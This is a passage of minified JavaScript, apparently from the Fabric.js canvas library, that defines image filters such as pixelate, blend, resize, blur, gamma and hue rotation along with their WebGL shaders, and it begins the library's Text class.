x,S,O,U,K,ee,se,ve,le,ye,z,M=y.imageData,p=M.data,D=M.height,w=M.width;for(S=0;S<D;S+=this.blocksize)for(O=0;O<w;O+=this.blocksize)for(U=p[x=4*S*w+4*O],K=p[x+1],ee=p[x+2],se=p[x+3],ye=Math.min(S+this.blocksize,D),z=Math.min(O+this.blocksize,w),ve=S;ve<ye;ve++)for(le=O;le<z;le++)p[x=4*ve*w+4*le]=U,p[x+1]=K,p[x+2]=ee,p[x+3]=se},isNeutralState:function(){return 1===this.blocksize},getUniformLocations:function(y,M){return{uBlocksize:y.getUniformLocation(M,"uBlocksize"),uStepW:y.getUniformLocation(M,"uStepW"),uStepH:y.getUniformLocation(M,"uStepH")}},sendUniformData:function(y,M){y.uniform1f(M.uBlocksize,this.blocksize)}}),g.Image.filters.Pixelate.fromObject=g.Image.filters.BaseFilter.fromObject}(we),function(E){"use strict";var g=E.fabric||(E.fabric={}),b=g.util.object.extend,_=g.Image.filters;_.RemoveColor=(0,g.util.createClass)(_.BaseFilter,{type:"RemoveColor",color:"#FFFFFF",fragmentSource:"precision highp float;\nuniform sampler2D uTexture;\nuniform vec4 uLow;\nuniform vec4 uHigh;\nvarying vec2 vTexCoord;\nvoid main() {\ngl_FragColor = texture2D(uTexture, vTexCoord);\nif(all(greaterThan(gl_FragColor.rgb,uLow.rgb)) && all(greaterThan(uHigh.rgb,gl_FragColor.rgb))) {\ngl_FragColor.a = 0.0;\n}\n}",distance:.02,useAlpha:!1,applyTo2d:function(M){var w,S,O,U,D=M.imageData.data,x=255*this.distance,K=new g.Color(this.color).getSource(),ee=[K[0]-x,K[1]-x,K[2]-x],se=[K[0]+x,K[1]+x,K[2]+x];for(w=0;w<D.length;w+=4)O=D[w+1],U=D[w+2],(S=D[w])>ee[0]&&O>ee[1]&&U>ee[2]&&S<se[0]&&O<se[1]&&U<se[2]&&(D[w+3]=0)},getUniformLocations:function(M,p){return{uLow:M.getUniformLocation(p,"uLow"),uHigh:M.getUniformLocation(p,"uHigh")}},sendUniformData:function(M,p){var D=new g.Color(this.color).getSource(),w=parseFloat(this.distance),S=[D[0]/255+w,D[1]/255+w,D[2]/255+w,1];M.uniform4fv(p.uLow,[0+D[0]/255-w,0+D[1]/255-w,0+D[2]/255-w,1]),M.uniform4fv(p.uHigh,S)},toObject:function(){return b(this.callSuper("toObject"),{color:this.color,distance:this.distance})}}),g.Image.filters.RemoveColor.fromObject=g.Image.filters.BaseFilter.fromObject}(we),function(E){"use strict";var g=E.fabric||(E.fabric={}),b=g.Image.filters,_=g.util.createClass,y={Brownie:[.5997,.34553,-.27082,0,.186,-.0377,.86095,.15059,0,-.1449,.24113,-.07441,.44972,0,-.02965,0,0,0,1,0],Vintage:[.62793,.32021,-.03965,0,.03784,.02578,.64411,.03259,0,.02926,.0466,-.08512,.52416,0,.02023,0,0,0,1,0],Kodachrome:[1.12855,-.39673,-.03992,0,.24991,-.16404,1.08352,-.05498,0,.09698,-.16786,-.56034,1.60148,0,.13972,0,0,0,1,0],Technicolor:[1.91252,-.85453,-.09155,0,.04624,-.30878,1.76589,-.10601,0,-.27589,-.2311,-.75018,1.84759,0,.12137,0,0,0,1,0],Polaroid:[1.438,-.062,-.062,0,0,-.122,1.378,-.122,0,0,-.016,-.016,1.483,0,0,0,0,0,1,0],Sepia:[.393,.769,.189,0,0,.349,.686,.168,0,0,.272,.534,.131,0,0,0,0,0,1,0],BlackWhite:[1.5,1.5,1.5,0,-1,1.5,1.5,1.5,0,-1,1.5,1.5,1.5,0,-1,0,0,0,1,0]};for(var M in y)b[M]=_(b.ColorMatrix,{type:M,matrix:y[M],mainParameter:!1,colorsOnly:!0}),g.Image.filters[M].fromObject=g.Image.filters.BaseFilter.fromObject}(we),function(E){"use strict";var g=E.fabric,b=g.Image.filters;b.BlendColor=(0,g.util.createClass)(b.BaseFilter,{type:"BlendColor",color:"#F95C63",mode:"multiply",alpha:1,fragmentSource:{multiply:"gl_FragColor.rgb *= uColor.rgb;\n",screen:"gl_FragColor.rgb = 1.0 - (1.0 - gl_FragColor.rgb) * (1.0 - uColor.rgb);\n",add:"gl_FragColor.rgb += uColor.rgb;\n",diff:"gl_FragColor.rgb = abs(gl_FragColor.rgb - uColor.rgb);\n",subtract:"gl_FragColor.rgb -= uColor.rgb;\n",lighten:"gl_FragColor.rgb = max(gl_FragColor.rgb, uColor.rgb);\n",darken:"gl_FragColor.rgb = min(gl_FragColor.rgb, uColor.rgb);\n",exclusion:"gl_FragColor.rgb += uColor.rgb - 2.0 * (uColor.rgb * gl_FragColor.rgb);\n",overlay:"if (uColor.r < 0.5) {\ngl_FragColor.r *= 2.0 * uColor.r;\n} else {\ngl_FragColor.r = 1.0 - 2.0 * (1.0 - gl_FragColor.r) * (1.0 - uColor.r);\n}\nif (uColor.g < 0.5) {\ngl_FragColor.g *= 2.0 * uColor.g;\n} else {\ngl_FragColor.g = 1.0 - 2.0 * (1.0 - gl_FragColor.g) * (1.0 - uColor.g);\n}\nif (uColor.b < 0.5) {\ngl_FragColor.b *= 2.0 * uColor.b;\n} else {\ngl_FragColor.b = 1.0 - 2.0 * (1.0 - gl_FragColor.b) * (1.0 - uColor.b);\n}\n",tint:"gl_FragColor.rgb *= (1.0 - uColor.a);\ngl_FragColor.rgb += uColor.rgb;\n"},buildSource:function(y){return"precision highp float;\nuniform sampler2D uTexture;\nuniform vec4 uColor;\nvarying vec2 vTexCoord;\nvoid main() {\nvec4 color = texture2D(uTexture, vTexCoord);\ngl_FragColor = color;\nif (color.a > 0.0) {\n"+this.fragmentSource[y]+"}\n}"},retrieveShader:function(y){var p,M=this.type+"_"+this.mode;return y.programCache.hasOwnProperty(M)||(p=this.buildSource(this.mode),y.programCache[M]=this.createProgram(y.context,p)),y.programCache[M]},applyTo2d:function(y){var w,x,S,O,U,K,ee,p=y.imageData.data,D=p.length,se=1-this.alpha;w=(ee=new g.Color(this.color).getSource())[0]*this.alpha,x=ee[1]*this.alpha,S=ee[2]*this.alpha;for(var ve=0;ve<D;ve+=4)switch(O=p[ve],U=p[ve+1],K=p[ve+2],this.mode){case"multiply":p[ve]=O*w/255,p[ve+1]=U*x/255,p[ve+2]=K*S/255;break;case"screen":p[ve]=255-(255-O)*(255-w)/255,p[ve+1]=255-(255-U)*(255-x)/255,p[ve+2]=255-(255-K)*(255-S)/255;break;case"add":p[ve]=O+w,p[ve+1]=U+x,p[ve+2]=K+S;break;case"diff":case"difference":p[ve]=Math.abs(O-w),p[ve+1]=Math.abs(U-x),p[ve+2]=Math.abs(K-S);break;case"subtract":p[ve]=O-w,p[ve+1]=U-x,p[ve+2]=K-S;break;case"darken":p[ve]=Math.min(O,w),p[ve+1]=Math.min(U,x),p[ve+2]=Math.min(K,S);break;case"lighten":p[ve]=Math.max(O,w),p[ve+1]=Math.max(U,x),p[ve+2]=Math.max(K,S);break;case"overlay":p[ve]=w<128?2*O*w/255:255-2*(255-O)*(255-w)/255,p[ve+1]=x<128?2*U*x/255:255-2*(255-U)*(255-x)/255,p[ve+2]=S<128?2*K*S/255:255-2*(255-K)*(255-S)/255;break;case"exclusion":p[ve]=w+O-2*w*O/255,p[ve+1]=x+U-2*x*U/255,p[ve+2]=S+K-2*S*K/255;break;case"tint":p[ve]=w+O*se,p[ve+1]=x+U*se,p[ve+2]=S+K*se}},getUniformLocations:function(y,M){return{uColor:y.getUniformLocation(M,"uColor")}},sendUniformData:function(y,M){var p=new g.Color(this.color).getSource();p[0]=this.alpha*p[0]/255,p[1]=this.alpha*p[1]/255,p[2]=this.alpha*p[2]/255,p[3]=this.alpha,y.uniform4fv(M.uColor,p)},toObject:function(){return{type:this.type,color:this.color,mode:this.mode,alpha:this.alpha}}}),g.Image.filters.BlendColor.fromObject=g.Image.filters.BaseFilter.fromObject}(we),function(E){"use strict";var g=E.fabric,b=g.Image.filters;b.BlendImage=(0,g.util.createClass)(b.BaseFilter,{type:"BlendImage",image:null,mode:"multiply",alpha:1,vertexSource:"attribute vec2 aPosition;\nvarying vec2 vTexCoord;\nvarying vec2 vTexCoord2;\nuniform mat3 uTransformMatrix;\nvoid main() {\nvTexCoord = aPosition;\nvTexCoord2 = (uTransformMatrix * vec3(aPosition, 1.0)).xy;\ngl_Position = vec4(aPosition * 2.0 - 1.0, 0.0, 1.0);\n}",fragmentSource:{multiply:"precision highp float;\nuniform sampler2D uTexture;\nuniform sampler2D uImage;\nuniform vec4 uColor;\nvarying vec2 vTexCoord;\nvarying vec2 vTexCoord2;\nvoid main() {\nvec4 color = texture2D(uTexture, vTexCoord);\nvec4 color2 = texture2D(uImage, vTexCoord2);\ncolor.rgba *= color2.rgba;\ngl_FragColor = color;\n}",mask:"precision highp float;\nuniform sampler2D uTexture;\nuniform sampler2D uImage;\nuniform vec4 uColor;\nvarying vec2 vTexCoord;\nvarying vec2 vTexCoord2;\nvoid main() {\nvec4 color = texture2D(uTexture, vTexCoord);\nvec4 color2 = texture2D(uImage, vTexCoord2);\ncolor.a = color2.a;\ngl_FragColor = color;\n}"},retrieveShader:function(y){var M=this.type+"_"+this.mode,p=this.fragmentSource[this.mode];return y.programCache.hasOwnProperty(M)||(y.programCache[M]=this.createProgram(y.context,p)),y.programCache[M]},applyToWebGL:function(y){var M=y.context,p=this.createTexture(y.filterBackend,this.image);this.bindAdditionalTexture(M,p,M.TEXTURE1),this.callSuper("applyToWebGL",y),this.unbindAdditionalTexture(M,M.TEXTURE1)},createTexture:function(y,M){return y.getCachedTexture(M.cacheKey,M._element)},calculateMatrix:function(){var y=this.image;return[1/y.scaleX,0,0,0,1/y.scaleY,0,-y.left/y._element.width,-y.top/y._element.height,1]},applyTo2d:function(y){var O,U,K,ee,se,ve,le,ye,z,l,A,M=y.imageData,p=y.filterBackend.resources,D=M.data,w=D.length,x=M.width,S=M.height,f=this.image;p.blendImage||(p.blendImage=g.util.createCanvasElement()),l=(z=p.blendImage).getContext("2d"),z.width!==x||z.height!==S?(z.width=x,z.height=S):l.clearRect(0,0,x,S),l.setTransform(f.scaleX,0,0,f.scaleY,f.left,f.top),l.drawImage(f._element,0,0,x,S),A=l.getImageData(0,0,x,S).data;for(var v=0;v<w;v+=4)switch(se=D[v],ve=D[v+1],le=D[v+2],ye=D[v+3],O=A[v],U=A[v+1],K=A[v+2],ee=A[v+3],this.mode){case"multiply":D[v]=se*O/255,D[v+1]=ve*U/255,D[v+2]=le*K/255,D[v+3]=ye*ee/255;break;case"mask":D[v+3]=ee}},getUniformLocations:function(y,M){return{uTransformMatrix:y.getUniformLocation(M,"uTransformMatrix"),uImage:y.getUniformLocation(M,"uImage")}},sendUniformData:function(y,M){var p=this.calculateMatrix();y.uniform1i(M.uImage,1),y.uniformMatrix3fv(M.uTransformMatrix,!1,p)},toObject:function(){return{type:this.type,image:this.image&&this.image.toObject(),mode:this.mode,alpha:this.alpha}}}),g.Image.filters.BlendImage.fromObject=function(y,M){g.Image.fromObject(y.image,function(p){var D=g.util.object.clone(y);D.image=p,M(new g.Image.filters.BlendImage(D))})}}(we),function(E){"use strict";var g=E.fabric||(E.fabric={}),b=Math.pow,_=Math.floor,y=Math.sqrt,M=Math.abs,p=Math.round,D=Math.sin,w=Math.ceil,x=g.Image.filters;x.Resize=(0,g.util.createClass)(x.BaseFilter,{type:"Resize",resizeType:"hermite",scaleX:1,scaleY:1,lanczosLobes:3,getUniformLocations:function(O,U){return{uDelta:O.getUniformLocation(U,"uDelta"),uTaps:O.getUniformLocation(U,"uTaps")}},sendUniformData:function(O,U){O.uniform2fv(U.uDelta,this.horizontal?[1/this.width,0]:[0,1/this.height]),O.uniform1fv(U.uTaps,this.taps)},retrieveShader:function(O){var U=this.getFilterWindow(),K=this.type+"_"+U;if(!O.programCache.hasOwnProperty(K)){var ee=this.generateShader(U);O.programCache[K]=this.createProgram(O.context,ee)}return O.programCache[K]},getFilterWindow:function(){return Math.ceil(this.lanczosLobes/this.tempScale)},getTaps:function(){for(var O=this.lanczosCreate(this.lanczosLobes),U=this.tempScale,K=this.getFilterWindow(),ee=new Array(K),se=1;se<=K;se++)ee[se-1]=O(se*U);return ee},generateShader:function(ee){for(var U=new Array(ee),K=this.fragmentSourceTOP,se=1;se<=ee;se++)U[se-1]=se+".0 * uDelta";return K+="uniform float uTaps["+ee+"];\n",K+="void main() {\n",K+="  vec4 color = texture2D(uTexture, vTexCoord);\n",K+="  float sum = 1.0;\n",U.forEach(function(ve,le){K+="  color += texture2D(uTexture, vTexCoord + "+ve+") * uTaps["+le+"];\n",K+="  color += texture2D(uTexture, vTexCoord - "+ve+") * uTaps["+le+"];\n",K+="  sum += 2.0 * uTaps["+le+"];\n"}),K+="  gl_FragColor = color / sum;\n",K+="}"},fragmentSourceTOP:"precision highp float;\nuniform sampler2D uTexture;\nuniform vec2 uDelta;\nvarying vec2 vTexCoord;\n",applyTo:function(O){O.webgl?(O.passes++,this.width=O.sourceWidth,this.horizontal=!0,this.dW=Math.round(this.width*this.scaleX),this.dH=O.sourceHeight,this.tempScale=this.dW/this.width,this.taps=this.getTaps(),O.destinationWidth=this.dW,this._setupFrameBuffer(O),this.applyToWebGL(O),this._swapTextures(O),O.sourceWidth=O.destinationWidth,this.height=O.sourceHeight,this.horizontal=!1,this.dH=Math.round(this.height*this.scaleY),this.tempScale=this.dH/this.height,this.taps=this.getTaps(),O.destinationHeight=this.dH,this._setupFrameBuffer(O),this.applyToWebGL(O),this._swapTextures(O),O.sourceHeight=O.destinationHeight):this.applyTo2d(O)},isNeutralState:function(){return 1===this.scaleX&&1===this.scaleY},lanczosCreate:function(O){return function(U){if(U>=O||U<=-O)return 0;if(U<1.1920929e-7&&U>-1.1920929e-7)return 1;var K=(U*=Math.PI)/O;return D(U)/U*D(K)/K}},applyTo2d:function(O){var U=O.imageData,K=this.scaleX,ee=this.scaleY;this.rcpScaleX=1/K,this.rcpScaleY=1/ee;var z,se=U.width,ve=U.height,le=p(se*K),ye=p(ve*ee);"sliceHack"===this.resizeType?z=this.sliceByTwo(O,se,ve,le,ye):"hermite"===this.resizeType?z=this.hermiteFastResize(O,se,ve,le,ye):"bilinear"===this.resizeType?z=this.bilinearFiltering(O,se,ve,le,ye):"lanczos"===this.resizeType&&(z=this.lanczosResize(O,se,ve,le,ye)),O.imageData=z},sliceByTwo:function(O,U,K,ee,se){var v,P,ve=O.imageData,ye=!1,z=!1,l=.5*U,f=.5*K,A=g.filterBackend.resources,G=0,X=0,L=U,h=0;for(A.sliceByTwo||(A.sliceByTwo=document.createElement("canvas")),((v=A.sliceByTwo).width<1.5*U||v.height<K)&&(v.width=1.5*U,v.height=K),(P=v.getContext("2d")).clearRect(0,0,1.5*U,K),P.putImageData(ve,0,0),ee=_(ee),se=_(se);!ye||!z;)U=l,K=f,ee<_(.5*l)?l=_(.5*l):(l=ee,ye=!0),se<_(.5*f)?f=_(.5*f):(f=se,z=!0),P.drawImage(v,G,X,U,K,L,h,l,f),G=L,X=h,h+=f;return P.getImageData(G,X,ee,se)},lanczosResize:function(O,U,K,ee,se){var le=O.imageData.data,ye=O.ctx.createImageData(ee,se),z=ye.data,l=this.lanczosCreate(this.lanczosLobes),f=this.rcpScaleX,A=this.rcpScaleY,v=2/this.rcpScaleX,P=2/this.rcpScaleY,G=w(f*this.lanczosLobes/2),X=w(A*this.lanczosLobes/2),L={},h={},R={};return function ve(J){var Z,ue,Ie,Ae,Ue,Xe,He,Be,qe,De,Ve;for(h.x=(J+.5)*f,R.x=_(h.x),Z=0;Z<se;Z++){for(h.y=(Z+.5)*A,R.y=_(h.y),Ue=0,Xe=0,He=0,Be=0,qe=0,ue=R.x-G;ue<=R.x+G;ue++)if(!(ue<0||ue>=U)){De=_(1e3*M(ue-h.x)),L[De]||(L[De]={});for(var ze=R.y-X;ze<=R.y+X;ze++)ze<0||ze>=K||(Ve=_(1e3*M(ze-h.y)),L[De][Ve]||(L[De][Ve]=l(y(b(De*v,2)+b(Ve*P,2))/1e3)),(Ie=L[De][Ve])>0&&(Ue+=Ie,Xe+=Ie*le[Ae=4*(ze*U+ue)],He+=Ie*le[Ae+1],Be+=Ie*le[Ae+2],qe+=Ie*le[Ae+3]))}z[Ae=4*(Z*ee+J)]=Xe/Ue,z[Ae+1]=He/Ue,z[Ae+2]=Be/Ue,z[Ae+3]=qe/Ue}return++J<ee?ve(J):ye}(0)},bilinearFiltering:function(O,U,K,ee,se){var l,f,A,v,P,G,X,R,h=0,J=this.rcpScaleX,Z=this.rcpScaleY,ue=4*(U-1),Ae=O.imageData.data,Ue=O.ctx.createImageData(ee,se),Xe=Ue.data;for(A=0;A<se;A++)for(v=0;v<ee;v++)for(P=J*v-(l=_(J*v)),G=Z*A-(f=_(Z*A)),R=4*(f*U+l),X=0;X<4;X++)Xe[h++]=Ae[R+X]*(1-P)*(1-G)+Ae[R+4+X]*P*(1-G)+Ae[R+ue+X]*G*(1-P)+Ae[R+ue+4+X]*P*G;return Ue},hermiteFastResize:function(O,U,K,ee,se){for(var ve=this.rcpScaleX,le=this.rcpScaleY,ye=w(ve/2),z=w(le/2),f=O.imageData.data,A=O.ctx.createImageData(ee,se),v=A.data,P=0;P<se;P++)for(var G=0;G<ee;G++){for(var X=4*(G+P*ee),L=0,h=0,R=0,J=0,Z=0,ue=0,Ie=0,Ae=(P+.5)*le,Ue=_(P*le);Ue<(P+1)*le;Ue++)for(var Xe=M(Ae-(Ue+.5))/z,He=(G+.5)*ve,Be=Xe*Xe,qe=_(G*ve);qe<(G+1)*ve;qe++){var De=M(He-(qe+.5))/ye,Ve=y(Be+De*De);Ve>1&&Ve<-1||(L=2*Ve*Ve*Ve-3*Ve*Ve+1)>0&&(Ie+=L*f[3+(De=4*(qe+Ue*U))],R+=L,f[De+3]<255&&(L=L*f[De+3]/250),J+=L*f[De],Z+=L*f[De+1],ue+=L*f[De+2],h+=L)}v[X]=J/h,v[X+1]=Z/h,v[X+2]=ue/h,v[X+3]=Ie/R}return A},toObject:function(){return{type:this.type,scaleX:this.scaleX,scaleY:this.scaleY,resizeType:this.resizeType,lanczosLobes:this.lanczosLobes}}}),g.Image.filters.Resize.fromObject=g.Image.filters.BaseFilter.fromObject}(we),function(E){"use strict";var g=E.fabric||(E.fabric={}),b=g.Image.filters;b.Contrast=(0,g.util.createClass)(b.BaseFilter,{type:"Contrast",fragmentSource:"precision highp float;\nuniform sampler2D uTexture;\nuniform float uContrast;\nvarying vec2 vTexCoord;\nvoid main() {\nvec4 color = texture2D(uTexture, vTexCoord);\nfloat contrastF = 1.015 * (uContrast + 1.0) / (1.0 * (1.015 - uContrast));\ncolor.rgb = contrastF * (color.rgb - 0.5) + 0.5;\ngl_FragColor = color;\n}",contrast:0,mainParameter:"contrast",applyTo2d:function(y){if(0!==this.contrast){var p,D=y.imageData.data,w=D.length,x=Math.floor(255*this.contrast),S=259*(x+255)/(255*(259-x));for(p=0;p<w;p+=4)D[p]=S*(D[p]-128)+128,D[p+1]=S*(D[p+1]-128)+128,D[p+2]=S*(D[p+2]-128)+128}},getUniformLocations:function(y,M){return{uContrast:y.getUniformLocation(M,"uContrast")}},sendUniformData:function(y,M){y.uniform1f(M.uContrast,this.contrast)}}),g.Image.filters.Contrast.fromObject=g.Image.filters.BaseFilter.fromObject}(we),function(E){"use strict";var g=E.fabric||(E.fabric={}),b=g.Image.filters;b.Saturation=(0,g.util.createClass)(b.BaseFilter,{type:"Saturation",fragmentSource:"precision highp float;\nuniform sampler2D uTexture;\nuniform float uSaturation;\nvarying vec2 vTexCoord;\nvoid main() {\nvec4 color = texture2D(uTexture, vTexCoord);\nfloat rgMax = max(color.r, color.g);\nfloat rgbMax = max(rgMax, color.b);\ncolor.r += rgbMax != color.r ? (rgbMax - color.r) * uSaturation : 0.00;\ncolor.g += rgbMax != color.g ? (rgbMax - color.g) * uSaturation : 0.00;\ncolor.b += rgbMax != color.b ? (rgbMax - color.b) * uSaturation : 0.00;\ngl_FragColor = color;\n}",saturation:0,mainParameter:"saturation",applyTo2d:function(y){if(0!==this.saturation){var x,S,p=y.imageData.data,D=p.length,w=-this.saturation;for(x=0;x<D;x+=4)S=Math.max(p[x],p[x+1],p[x+2]),p[x]+=S!==p[x]?(S-p[x])*w:0,p[x+1]+=S!==p[x+1]?(S-p[x+1])*w:0,p[x+2]+=S!==p[x+2]?(S-p[x+2])*w:0}},getUniformLocations:function(y,M){return{uSaturation:y.getUniformLocation(M,"uSaturation")}},sendUniformData:function(y,M){y.uniform1f(M.uSaturation,-this.saturation)}}),g.Image.filters.Saturation.fromObject=g.Image.filters.BaseFilter.fromObject}(we),function(E){"use strict";var g=E.fabric||(E.fabric={}),b=g.Image.filters;b.Vibrance=(0,g.util.createClass)(b.BaseFilter,{type:"Vibrance",fragmentSource:"precision highp float;\nuniform sampler2D uTexture;\nuniform float uVibrance;\nvarying vec2 vTexCoord;\nvoid main() {\nvec4 color = texture2D(uTexture, vTexCoord);\nfloat max = max(color.r, max(color.g, color.b));\nfloat avg = (color.r + color.g + color.b) / 3.0;\nfloat amt = (abs(max - avg) * 2.0) * uVibrance;\ncolor.r += max != color.r ? (max - color.r) * amt : 0.00;\ncolor.g += max != color.g ? (max - color.g) * amt : 0.00;\ncolor.b += max != color.b ? (max - color.b) * amt : 0.00;\ngl_FragColor = color;\n}",vibrance:0,mainParameter:"vibrance",applyTo2d:function(y){if(0!==this.vibrance){var x,S,U,p=y.imageData.data,D=p.length,w=-this.vibrance;for(x=0;x<D;x+=4)S=Math.max(p[x],p[x+1],p[x+2]),U=2*Math.abs(S-(p[x]+p[x+1]+p[x+2])/3)/255*w,p[x]+=S!==p[x]?(S-p[x])*U:0,p[x+1]+=S!==p[x+1]?(S-p[x+1])*U:0,p[x+2]+=S!==p[x+2]?(S-p[x+2])*U:0}},getUniformLocations:function(y,M){return{uVibrance:y.getUniformLocation(M,"uVibrance")}},sendUniformData:function(y,M){y.uniform1f(M.uVibrance,-this.vibrance)}}),g.Image.filters.Vibrance.fromObject=g.Image.filters.BaseFilter.fromObject}(we),function(E){"use strict";var g=E.fabric||(E.fabric={}),b=g.Image.filters;b.Blur=(0,g.util.createClass)(b.BaseFilter,{type:"Blur",fragmentSource:"precision highp float;\nuniform sampler2D uTexture;\nuniform vec2 uDelta;\nvarying vec2 vTexCoord;\nconst float nSamples = 15.0;\nvec3 v3offset = vec3(12.9898, 78.233, 151.7182);\nfloat random(vec3 scale) {\nreturn fract(sin(dot(gl_FragCoord.xyz, scale)) * 43758.5453);\n}\nvoid main() {\nvec4 color = vec4(0.0);\nfloat total = 0.0;\nfloat offset = random(v3offset);\nfor (float t = -nSamples; t <= nSamples; t++) {\nfloat percent = (t + offset - 0.5) / nSamples;\nfloat weight = 1.0 - abs(percent);\ncolor += texture2D(uTexture, vTexCoord + uDelta * percent) * weight;\ntotal += weight;\n}\ngl_FragColor = color / total;\n}",blur:0,mainParameter:"blur",applyTo:function(y){y.webgl?(this.aspectRatio=y.sourceWidth/y.sourceHeight,y.passes++,this._setupFrameBuffer(y),this.horizontal=!0,this.applyToWebGL(y),this._swapTextures(y),this._setupFrameBuffer(y),this.horizontal=!1,this.applyToWebGL(y),this._swapTextures(y)):this.applyTo2d(y)},applyTo2d:function(y){y.imageData=this.simpleBlur(y)},simpleBlur:function(y){var p,D,M=y.filterBackend.resources,w=y.imageData.width,x=y.imageData.height;M.blurLayer1||(M.blurLayer1=g.util.createCanvasElement(),M.blurLayer2=g.util.createCanvasElement()),D=M.blurLayer2,((p=M.blurLayer1).width!==w||p.height!==x)&&(D.width=p.width=w,D.height=p.height=x);var K,ee,se,ve,S=p.getContext("2d"),O=D.getContext("2d"),U=15,le=.06*this.blur*.5;for(S.putImageData(y.imageData,0,0),O.clearRect(0,0,w,x),ve=-U;ve<=U;ve++)se=le*(ee=ve/U)*w+(K=(Math.random()-.5)/4),O.globalAlpha=1-Math.abs(ee),O.drawImage(p,se,K),S.drawImage(D,0,0),O.globalAlpha=1,O.clearRect(0,0,D.width,D.height);for(ve=-U;ve<=U;ve++)se=le*(ee=ve/U)*x+(K=(Math.random()-.5)/4),O.globalAlpha=1-Math.abs(ee),O.drawImage(p,K,se),S.drawImage(D,0,0),O.globalAlpha=1,O.clearRect(0,0,D.width,D.height);y.ctx.drawImage(p,0,0);var ye=y.ctx.getImageData(0,0,p.width,p.height);return S.globalAlpha=1,S.clearRect(0,0,p.width,p.height),ye},getUniformLocations:function(y,M){return{delta:y.getUniformLocation(M,"uDelta")}},sendUniformData:function(y,M){var p=this.chooseRightDelta();y.uniform2fv(M.delta,p)},chooseRightDelta:function(){var p,y=1,M=[0,0];return this.horizontal?this.aspectRatio>1&&(y=1/this.aspectRatio):this.aspectRatio<1&&(y=this.aspectRatio),p=y*this.blur*.12,this.horizontal?M[0]=p:M[1]=p,M}}),b.Blur.fromObject=g.Image.filters.BaseFilter.fromObject}(we),function(E){"use strict";var g=E.fabric||(E.fabric={}),b=g.Image.filters;b.Gamma=(0,g.util.createClass)(b.BaseFilter,{type:"Gamma",fragmentSource:"precision highp float;\nuniform sampler2D uTexture;\nuniform vec3 uGamma;\nvarying vec2 vTexCoord;\nvoid main() {\nvec4 color = texture2D(uTexture, vTexCoord);\nvec3 correction = (1.0 / uGamma);\ncolor.r = pow(color.r, correction.r);\ncolor.g = pow(color.g, correction.g);\ncolor.b = pow(color.b, correction.b);\ngl_FragColor = color;\ngl_FragColor.rgb *= color.a;\n}",gamma:[1,1,1],mainParameter:"gamma",initialize:function(y){this.gamma=[1,1,1],b.BaseFilter.prototype.initialize.call(this,y)},applyTo2d:function(y){var U,p=y.imageData.data,D=this.gamma,w=p.length,x=1/D[0],S=1/D[1],O=1/D[2];for(this.rVals||(this.rVals=new Uint8Array(256),this.gVals=new Uint8Array(256),this.bVals=new Uint8Array(256)),U=0,w=256;U<w;U++)this.rVals[U]=255*Math.pow(U/255,x),this.gVals[U]=255*Math.pow(U/255,S),this.bVals[U]=255*Math.pow(U/255,O);for(U=0,w=p.length;U<w;U+=4)p[U]=this.rVals[p[U]],p[U+1]=this.gVals[p[U+1]],p[U+2]=this.bVals[p[U+2]]},getUniformLocations:function(y,M){return{uGamma:y.getUniformLocation(M,"uGamma")}},sendUniformData:function(y,M){y.uniform3fv(M.uGamma,this.gamma)}}),g.Image.filters.Gamma.fromObject=g.Image.filters.BaseFilter.fromObject}(we),function(E){"use strict";var g=E.fabric||(E.fabric={}),b=g.Image.filters;b.Composed=(0,g.util.createClass)(b.BaseFilter,{type:"Composed",subFilters:[],initialize:function(y){this.callSuper("initialize",y),this.subFilters=this.subFilters.slice(0)},applyTo:function(y){y.passes+=this.subFilters.length-1,this.subFilters.forEach(function(M){M.applyTo(y)})},toObject:function(){return g.util.object.extend(this.callSuper("toObject"),{subFilters:this.subFilters.map(function(y){return y.toObject()})})},isNeutralState:function(){return!this.subFilters.some(function(y){return!y.isNeutralState()})}}),g.Image.filters.Composed.fromObject=function(y,M){var D=(y.subFilters||[]).map(function(x){return new g.Image.filters[x.type](x)}),w=new g.Image.filters.Composed({subFilters:D});return M&&M(w),w}}(we),function(E){"use strict";var g=E.fabric||(E.fabric={}),b=g.Image.filters;b.HueRotation=(0,g.util.createClass)(b.ColorMatrix,{type:"HueRotation",rotation:0,mainParameter:"rotation",calculateMatrix:function(){var y=this.rotation*Math.PI,M=g.util.cos(y),p=g.util.sin(y),D=1/3,w=Math.sqrt(D)*p,x=1-M;this.matrix=[1,0,0,0,0,0,1,0,0,0,0,0,1,0,0,0,0,0,1,0],this.matrix[0]=M+x/3,this.matrix[1]=D*x-w,this.matrix[2]=D*x+w,this.matrix[5]=D*x+w,this.matrix[6]=M+D*x,this.matrix[7]=D*x-w,this.matrix[10]=D*x-w,this.matrix[11]=D*x+w,this.matrix[12]=M+D*x},isNeutralState:function(y){return this.calculateMatrix(),b.BaseFilter.prototype.isNeutralState.call(this,y)},applyTo:function(y){this.calculateMatrix(),b.BaseFilter.prototype.applyTo.call(this,y)}}),g.Image.filters.HueRotation.fromObject=g.Image.filters.BaseFilter.fromObject}(we),function(E){"use strict";var g=E.fabric||(E.fabric={}),b=g.util.object.clone;if(g.Text)g.warn("fabric.Text is already defined");else{var _="fontFamily fontWeight fontSize text underline overline linethrough textAlign fontStyle lineHeight textBackgroundColor charSpacing styles direction path pathStartOffset pathSide pathAlign".split(" ");g.Text=g.util.createClass(g.Object,{_dimensionAffectingProps:["fontSize","fontWeight","fontFamily","fontStyle","lineHeight","text","charSpacing","textAlign","styles","path","pathStartOffset","pathSide","pathAlign"],_reNewline:/\r?\n/,_reSpacesAndTabs:/[ \t\r]/g,_reSpaceAndTab:/[ \t\r]/,_reWords:/\S+/g,type:"text",fontSize:40,fontWeight:"normal",fontFamily:"Times New Roman",underline:!1,overline:!1,linethrough:!1,textAlign:"left",fontStyle:"normal",lineHeight:1.16,superscript:{size:.6,baseline:-.35},subscript:{size:.6,baseline:.11},textBackgroundColor:"",stateProperties:g.Object.prototype.stateProperties.concat(_),cacheProperties:g.Object.prototype.cacheProperties.concat(_),stroke:null,shadow:null,path:null,pathStartOffset:0,pathSide:"left",pathAlign:"baseline",_fontSizeFraction:.222,offsets:{underline:.1,linethrough:-.315,overline:-.88},_fontSizeMult:1.13,charSpacing:0,styles:null,_measuringContext:null,deltaY:0,direction:"ltr",_styleProperties:["stroke","strokeWidth","fill","fontFamily","fontSize","fontWeight","fontStyle","underline","overline","linethrough","deltaY","textBackgroundColor"],__charBounds:[],CACHE_FONT_SIZE:400,MIN_TEXT_WIDTH:2,initialize:function(y,M){this.styles=M&&M.styles||{},this.text=y,this.__skipDimension=!0,this.callSuper("initialize",M),this.path&&this.setPathInfo(),this.__skipDimension=!1,this.initDimensions(),this.setCoords(),this.setupState({propertySet:"_dimensionAffecting